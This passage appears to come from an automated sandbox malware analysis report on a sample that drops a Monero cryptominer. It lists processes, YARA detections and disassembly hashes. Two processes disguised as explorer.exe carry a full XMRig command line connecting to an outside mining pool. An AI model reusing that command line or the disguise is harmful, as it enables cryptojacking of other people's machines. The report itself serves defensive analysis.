                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: taskkill.exe PID: 6532 Parent PID: 4608

                                                                                                                                  General

                                                                                                                                  Start time:14:11:00
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:taskkill /f /PID "6040"
                                                                                                                                  Imagebase:0x7ff747240000
                                                                                                                                  File size:94720 bytes
                                                                                                                                  MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: explorer.exe PID: 4876 Parent PID: 6840

                                                                                                                                  General

                                                                                                                                  Start time:14:11:02
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                                                                                                                                  Imagebase:0x7ff6fee60000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.799518871.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.927522845.0000000140752000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.796871079.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.804927838.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.917920684.000000000130B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.794400216.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                  Chronological Activities

                                                                                                                                  Analysis Process: explorer.exe PID: 6924 Parent PID: 6012

                                                                                                                                  General

                                                                                                                                  Start time:14:11:02
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                                                                                                                                  Imagebase:0x7ff6fee60000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.927622766.0000000140752000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.819000457.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.801221568.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.918136554.00000000004BA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.814593137.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.812542531.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                  Chronological Activities

                                                                                                                                  Disassembly

                                                                                                                                  Code Analysis

                                                                                                                                  Reset < >

                                                                                                                                    Analysis Process: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe PID: 6220 Parent PID: 5336 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCOMMON

                                                                                                                                    Executed Functions

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 026BCCBF, Relevance: 3.9, Strings: 3, Instructions: 157COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.653688407.00000000026BC000.00000004.00000001.sdmp, Offset: 026BC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_26bc000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "R@$|mE$>D
                                                                                                                                    • API String ID: 0-1509467082
                                                                                                                                    • Opcode ID: 0361a8cf135fb7e0c5c67543b842374964cc07baef0fa8fd6e89363092b1c717
                                                                                                                                    • Instruction ID: a654520753fedad29a0c42f97d77054cccf69038b47e70443477ead968898cf2
                                                                                                                                    • Opcode Fuzzy Hash: 0361a8cf135fb7e0c5c67543b842374964cc07baef0fa8fd6e89363092b1c717
                                                                                                                                    • Instruction Fuzzy Hash: 1141237A518501DFC20ECA38DC509EB7B929ED5271B58CB2BF0138A1E8C3349687C785
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 026BCCCE, Relevance: 3.9, Strings: 3, Instructions: 149COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.653688407.00000000026BC000.00000004.00000001.sdmp, Offset: 026BC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_26bc000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "R@$|mE$>D
                                                                                                                                    • API String ID: 0-1509467082
                                                                                                                                    • Opcode ID: 2e48da2a0d3aa73de9ee3e70b3e7b926aaf3b0ce282e489f366247307bd45602
                                                                                                                                    • Instruction ID: c9d33a6b07ccc06caf1d66b33a128f04ea8e4a7ac27b1a030f68ba4b1ffd9c93
                                                                                                                                    • Opcode Fuzzy Hash: 2e48da2a0d3aa73de9ee3e70b3e7b926aaf3b0ce282e489f366247307bd45602
                                                                                                                                    • Instruction Fuzzy Hash: 1741237A518101DFC20ECA38DD508EB7BA29FD9270B58CB2BB053CA1E8D3309687C785
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 026BCCE1, Relevance: 3.9, Strings: 3, Instructions: 142COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.653688407.00000000026BC000.00000004.00000001.sdmp, Offset: 026BC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_26bc000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "R@$|mE$>D
                                                                                                                                    • API String ID: 0-1509467082
                                                                                                                                    • Opcode ID: 90f006f7f0e76eef4299618198584fe9cce61e94310e144d36101f6d35746592
                                                                                                                                    • Instruction ID: 8c6fcbff1206ea13bf6ad19f22286245d577cf53dda9087604d031f679f5bfdd
                                                                                                                                    • Opcode Fuzzy Hash: 90f006f7f0e76eef4299618198584fe9cce61e94310e144d36101f6d35746592
                                                                                                                                    • Instruction Fuzzy Hash: 8C41247A518101DFC20ECA34DD508EB7BA2DFD9260B58CB2BF456CA1E8D330A687C785
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 026BCCE8, Relevance: 3.9, Strings: 3, Instructions: 140COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.653688407.00000000026BC000.00000004.00000001.sdmp, Offset: 026BC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_26bc000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "R@$|mE$>D
                                                                                                                                    • API String ID: 0-1509467082
                                                                                                                                    • Opcode ID: 81d1624352ba2badb8637b99749fba02c5e1de671bf37076a9cd474d87f9ac1b
                                                                                                                                    • Instruction ID: 28be27f74c9687acbe8bb67f37799a7b4cde75c61b0ae338abc03e759594c063
                                                                                                                                    • Opcode Fuzzy Hash: 81d1624352ba2badb8637b99749fba02c5e1de671bf37076a9cd474d87f9ac1b
                                                                                                                                    • Instruction Fuzzy Hash: 7041237A518101DFC20ECA34DD508EB7BA2DFD9260B58CB2BF452CA1E8C330A687C785
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 026BCCF7, Relevance: 3.9, Strings: 3, Instructions: 137COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.653688407.00000000026BC000.00000004.00000001.sdmp, Offset: 026BC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_26bc000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "R@$|mE$>D
                                                                                                                                    • API String ID: 0-1509467082
                                                                                                                                    • Opcode ID: b19532adb3cac775440fc931723bcae753f70ca2d013204a4fe2e9751d66955c
                                                                                                                                    • Instruction ID: 36153fa2bbe59a5ddad04c8154b858130b5168de17c43c3c084954860d7005bb
                                                                                                                                    • Opcode Fuzzy Hash: b19532adb3cac775440fc931723bcae753f70ca2d013204a4fe2e9751d66955c
                                                                                                                                    • Instruction Fuzzy Hash: D341357A518101DFC20ECA34DD508EB7BA6DFC9260B58CB2BF0478A1E8C330A683C785
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 026BCD1F, Relevance: 3.9, Strings: 3, Instructions: 125COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.653688407.00000000026BC000.00000004.00000001.sdmp, Offset: 026BC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_26bc000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "R@$|mE$>D
                                                                                                                                    • API String ID: 0-1509467082
                                                                                                                                    • Opcode ID: 0eaded42648ffe99ac6a3743126d8010e31d6eae396838cfada7a0047bceffa5
                                                                                                                                    • Instruction ID: 6b73af08c5c5954d2c8085719d95db97d9c9b5f591d749c46ea827cccc587104
                                                                                                                                    • Opcode Fuzzy Hash: 0eaded42648ffe99ac6a3743126d8010e31d6eae396838cfada7a0047bceffa5
                                                                                                                                    • Instruction Fuzzy Hash: CD31237A61C101DFD24ECA34DD409EB7BA2DFC9260B58CB2FE0468A1A8C3349687C785
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 026BCD34, Relevance: 3.9, Strings: 3, Instructions: 120COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.653688407.00000000026BC000.00000004.00000001.sdmp, Offset: 026BC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_26bc000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "R@$|mE$>D
                                                                                                                                    • API String ID: 0-1509467082
